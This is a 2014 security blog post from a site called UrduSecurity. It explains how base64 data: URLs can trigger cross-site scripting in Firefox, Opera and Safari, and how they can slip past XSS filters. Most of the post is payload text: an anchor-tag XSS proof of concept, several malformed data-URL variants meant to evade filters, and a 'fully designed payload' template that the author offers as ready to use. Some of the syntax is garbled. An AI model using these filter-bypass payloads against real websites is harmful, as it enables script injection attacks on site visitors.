Sunday, 22 June 2014



Hello Friends,

After a Long time I'm Just Writing a Blog Post but Believe me its Really Fun , and Very Very Deeper Im Gonna TAke you if you really Understood What I'm gonna Describe Below.

Let's Start, Basically Data_Urls in their Base64 Encoded Form can be Used For XSS Filter Bypass. and it gets Serious While working with Firefox & Opera. When Newly Opened Documents Retain Access for Opening Page (Loading Completely). So Attacker Can Easily Trigger XSS on These Semi-Loaded Tags.

<a target=_blank href="data:text/html,");alert(1)//">Click Me</a>

Even We Can Base64_Encode This Payload. But Google-Chrome Will Block Attacker's Trick , So he Got Limited Options in His Pocket.


UrduSecurity

 

Fun Starts Now


 Now What if a Specific xss Filter Knows about data and try to Filter/Reject The Payload?? We Can ByPass it Still Ofcourse!! 

I Found an Intresting Way to Bypass it and You Might Like it .

data:text/html;base64UrduSecurity,[Attack-Payload] - Firefox & Safari data:text/html:;base64,[Attack-Payload]
data:text/html:[A-Lot-of-White-Spaces];base64,[Attack-Payload]
data:text/html;base64,,[Attack-Payload] - Opera

and Here is Fully Designed Payload Ready !

data:text,html;<before>base64<after>,[base64content]

This TAble Might Help You Someday.

UrduSecurity



Hope You Guys will Like This Tutorial, Leave Your Feed BAck, In case of Any Queries Let me know.

Playing with DATA URL Tags in HTML

  • Uploaded by: Unknown
  • Views:
  • Category: , ,
  • Share

    0 comments:

    Post a Comment

     
    Copyright © HACK | Designed by Muhammad Adeel | Founder UrduSecurity